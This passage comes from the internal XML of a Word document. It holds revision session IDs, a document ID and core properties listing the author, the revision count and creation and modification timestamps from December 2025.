    <w:rsid w:val="000313F0"/>
    <w:rsid w:val="00267103"/>
    <w:rsid w:val="003A5309"/>
    <w:rsid w:val="00586DCA"/>
    <w:rsid w:val="0069044A"/>
    <w:rsid w:val="00AC538F"/>
    <w:rsid w:val="00E0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91AE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{64398EAA-6DFA-4209-9BC0-505CA50A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Nhất Phong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Đỗ Nhất Phong</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-17T12:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-17T12:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>